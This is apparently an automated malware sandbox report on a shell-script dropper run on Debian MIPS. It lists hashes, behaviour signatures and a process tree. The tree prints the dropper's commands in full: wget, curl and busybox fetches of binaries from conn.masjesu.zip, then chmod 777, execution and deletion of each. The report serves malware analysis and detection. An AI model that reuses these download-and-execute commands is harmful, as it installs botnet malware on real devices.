Analysis
-
max time kernel
89s -
max time network
91s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
01-11-2024 05:40
Static task
static1
Behavioral task
behavioral1
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh
-
Size
10KB
-
MD5
270866c69345a640bdce4a90f85e3b15
-
SHA1
c7cfe722aff43d909a51f45bd9f65101e526b1d2
-
SHA256
d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374
-
SHA512
4c1edec9fde9d014df3adfa52d06bcc615d0029e3ffbc1685e50004ace4d94a67dbcd0ee88e35d9d338581d4f0f2ad79deee6ac663ee0cb77d039e19fcf610c9
-
SSDEEP
192:u8FUMkZJMMvOJ8lpHzIJxheMMvO80HzIJx5Ux:u8FZmJMMvOJ8l9MMvO8pO
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 887 chmod 910 chmod 964 chmod 894 chmod 972 chmod 988 chmod 735 chmod 742 chmod 761 chmod 838 chmod 879 chmod 1011 chmod 795 chmod 1018 chmod 956 chmod 980 chmod 819 chmod 917 chmod 933 chmod 949 chmod 925 chmod 862 chmod 996 chmod 1004 chmod 809 chmod 871 chmod 902 chmod 941 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 736 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs 743 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame 763 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo 797 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l 810 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX 820 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU 839 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb 864 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu 872 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt 880 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu 888 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS 895 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM 903 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u 911 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX 918 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l 926 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt 934 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu 942 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU 950 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb 957 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu 965 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u 973 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS 981 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM 989 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo 997 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 1005 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs 1012 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame 1019 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 746 wget 1014 wget 755 busybox 852 curl 875 wget 906 wget 924 busybox 963 busybox 713 wget 960 wget 985 curl 824 curl 916 busybox 812 wget 813 curl 818 busybox 870 busybox 890 wget 893 busybox 1017 busybox 733 busybox 741 busybox 914 curl 945 wget 977 curl 984 wget 1007 wget 801 wget 868 curl 878 busybox 921 wget 969 curl 992 wget 1001 curl 876 curl 883 wget 901 busybox 993 curl 886 busybox 898 wget 932 busybox 946 curl 948 busybox 961 curl 979 busybox 747 curl 767 wget 858 busybox 940 busybox 1003 busybox 1015 curl 1008 curl 739 curl 808 busybox 891 curl 929 wget 953 curl 987 busybox 1000 wget 725 curl 738 wget 776 curl 995 busybox 788 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u curl File opened for modification /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu curl File opened for modification /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 curl File opened for modification /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu curl File opened for modification /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM curl File opened for modification /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU curl File opened for modification /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS curl File opened for modification /tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7 curl File opened for modification /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs curl File opened for modification /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo curl File opened for modification /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb curl File opened for modification /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame curl File opened for modification /tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb curl File opened for modification /tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM curl File opened for modification /tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu curl File opened for modification /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l curl File opened for modification /tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu curl File opened for modification /tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS curl File opened for modification /tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u curl File opened for modification /tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame curl File opened for modification /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX curl File opened for modification /tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU curl File opened for modification /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt curl File opened for modification /tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX curl File opened for modification /tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l curl File opened for modification /tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt curl File opened for modification /tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo curl File opened for modification /tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs curl
Processes
-
/tmp/d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh/tmp/d20fcbd9dafcc9a9b59f84832e08cc1bf957ec676ea44d2d26f4f09485a8f374.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:713
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:733
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- System Network Configuration Discovery
PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:766
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:767
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:800
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:801
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:808
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:811
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- System Network Configuration Discovery
PID:818
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:821
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:822
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:831
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- System Network Configuration Discovery
PID:870
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:909
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu2⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
